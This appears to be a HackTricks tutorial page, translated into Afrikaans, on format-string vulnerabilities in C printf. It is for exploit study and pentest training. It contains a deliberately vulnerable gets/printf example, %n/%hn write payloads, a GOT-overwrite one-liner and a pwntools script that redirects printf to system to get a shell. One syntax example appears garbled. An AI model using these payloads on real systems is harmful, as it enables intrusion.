hacktricks/reversing-and-exploiting/linux-exploiting-basic-esp/format-strings
2024-07-18 18:31:10 +00:00
..
format-strings-template.md Translated ['1911-pentesting-fox.md', '6881-udp-pentesting-bittorrent.md 2024-07-18 18:31:10 +00:00
README.md Translated ['exploiting/linux-exploiting-basic-esp/README.md', 'reversin 2024-04-02 19:47:20 +00:00

Formaatreekse

Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)!

Basiese Inligting

In C is printf 'n funksie wat gebruik kan word om 'n string af te druk. Die eerste parameter wat hierdie funksie verwag, is die rou teks met die formateerders. Die volgende parameters wat verwag word, is die waardes om die formateerders van die rou teks te vervang.

Die kwesbaarheid verskyn wanneer 'n aanvallersteks as die eerste argument vir hierdie funksie gebruik word. Die aanvaller sal in staat wees om 'n spesiale inset te skep wat die printf-formaatreeksvermoëns misbruik om enige data in enige adres te lees en te skryf (leesbaar/skryfbaar). Deur op hierdie manier te kan willekeurige kode uitvoer.

Formateerders:

%08x —> 8 hex bytes
%d —> Entire
%u —> Unsigned
%s —> String
%n —> Number of written bytes
%hn —> Occupies 2 bytes instead of 4
<n>$X —> Direct access, Example: ("%3$d", var1, var2, var3) —> Access to var3

Voorbeelde:

  • Kwesbare voorbeeld:
char buffer[30];
gets(buffer);  // Dangerous: takes user input without restrictions.
printf(buffer);  // If buffer contains "%x", it reads from the stack.
  • Normale Gebruik:
int value = 1205;
printf("%x %x %x", value, value, value);  // Outputs: 4b5 4b5 4b5
  • Met Ontbrekende Argumente:
printf("%x %x %x", value);  // Unexpected output: reads random values from the stack.

Toegang tot Aanwysers

Die formaat %<n>$x, waar n 'n nommer is, maak dit moontlik om aan printf aan te dui om die n-de parameter (vanaf die stapel) te kies. Dus, as jy die 4de parameter vanaf die stapel wil lees deur printf te gebruik, kan jy dit doen:

printf("%x %x %x %x")

en jy sou van die eerste tot die vierde parameter lees.

Of jy kan doen:

printf("$4%x")

en lees direk die vierde.

Let daarop dat die aanvaller die printf parameter beheer, wat basies beteken dat sy inset in die stapel gaan wees wanneer printf geroep word, wat beteken dat hy spesifieke geheue-adresse in die stapel kan skryf.

{% hint style="danger" %} 'n Aanvaller wat hierdie inset beheer, sal in staat wees om willekeurige adresse in die stapel by te voeg en printf hulle te laat toegang. In die volgende afdeling sal verduidelik word hoe om van hierdie gedrag gebruik te maak. {% endhint %}

Willekeurige Lees

Dit is moontlik om die formateerder $n%s te gebruik om printf die adres wat in die n-posisie geleë is, te laat kry en dit dan asof dit 'n string was te druk (druk totdat 'n 0x00 gevind word). So as die basisadres van die binêre lêer 0x8048000 is, en ons weet dat die gebruikerinset begin in die 4de posisie in die stapel, is dit moontlik om die begin van die binêre lêer te druk met:

from pwn import *

p = process('./bin')

payload = b'%6$p' #4th param
payload += b'xxxx' #5th param (needed to fill 8bytes with the initial input)
payload += p32(0x8048000) #6th param

p.sendline(payload)
log.info(p.clean()) # b'\x7fELF\x01\x01\x01||||'

{% hint style="danger" %} Let daarop dat jy nie die adres 0x8048000 aan die begin van die inset kan plaas nie omdat die string in 0x00 aan die einde van daardie adres gekat sal word. {% endhint %}

Willekeurige Skryf

Die formater $<num>%n skryf die aantal geskrewe bytes in die aangeduide adres in die <num> param in die stapel. As 'n aanvaller soveel karakters kan skryf as hy wil met printf, sal hy in staat wees om $<num>%n 'n willekeurige getal in 'n willekeurige adres te laat skryf.

Gelukkig is dit nie nodig om 9999 "A"s by die inset te voeg om die nommer 9999 te skryf nie, om dit te doen, is dit moontlik om die formater %.<num-write>%<num>$n te gebruik om die nommer <num-write> in die adres aangedui deur die num posisie te skryf.

AAAA%.6000d%4\$n —> Write 6004 in the address indicated by the 4º param
AAAA.%500\$08x —> Param at offset 500

Echter, let daarop dat gewoonlik om 'n adres soos 0x08049724 te skryf (wat 'n GROOT nommer is om in een keer te skryf), word $hn gebruik in plaas van $n. Dit maak dit moontlik om slegs 2 Bytes te skryf. Daarom word hierdie operasie twee keer uitgevoer, een keer vir die hoogste 2B van die adres en nog 'n keer vir die laer een.

Hierdie kwesbaarheid maak dit dus moontlik om enigiets in enige adres te skryf (arbitrêre skryf).

In hierdie voorbeeld is die doel om die adres van 'n funksie in die GOT-tabel te oorwryf wat later geroep sal word. Alhoewel dit ook ander arbitrêre skryf-na-uitvoer-tegnieke kan misbruik:

{% content-ref url="../arbitrary-write-2-exec/" %} arbitrary-write-2-exec {% endcontent-ref %}

Ons gaan 'n funksie wat sy argumente van die gebruiker ontvang oorskryf en dit na die system funksie wysig.
Soos genoem, om die adres te skryf, is gewoonlik 2 stappe nodig: Jy skryf eers 2Bytes van die adres en dan die ander 2. Om dit te doen word $hn gebruik.

  • HOB word genoem vir die 2 hoër bytes van die adres
  • LOB word genoem vir die 2 laer bytes van die adres

Dan, as gevolg van hoe die formaatstring werk, moet jy eerstens die kleinste van [HOB, LOB] skryf en dan die ander een.

As HOB < LOB
[adres+2][adres]%.[HOB-8]x%[offset]\$hn%.[LOB-HOB]x%[offset+1]

As HOB > LOB
[adres+2][adres]%.[LOB-8]x%[offset+1]\$hn%.[HOB-LOB]x%[offset]

HOB LOB HOB_shellcode-8 NºParam_dir_HOB LOB_shell-HOB_shell NºParam_dir_LOB

{% code overflow="wrap" %}

python -c 'print "\x26\x97\x04\x08"+"\x24\x97\x04\x08"+ "%.49143x" + "%4$hn" + "%.15408x" + "%5$hn"'

{% endcode %}

Pwntools Templaat

Jy kan 'n templaat vind om 'n aanval voor te berei vir hierdie soort kwesbaarheid in:

{% content-ref url="format-strings-template.md" %} format-strings-template.md {% endcontent-ref %}

Of hierdie basiese voorbeeld van hier:

from pwn import *

elf = context.binary = ELF('./got_overwrite-32')
libc = elf.libc
libc.address = 0xf7dc2000       # ASLR disabled

p = process()

payload = fmtstr_payload(5, {elf.got['printf'] : libc.sym['system']})
p.sendline(payload)

p.clean()

p.sendline('/bin/sh')

p.interactive()

Ander Voorbeelde & Verwysings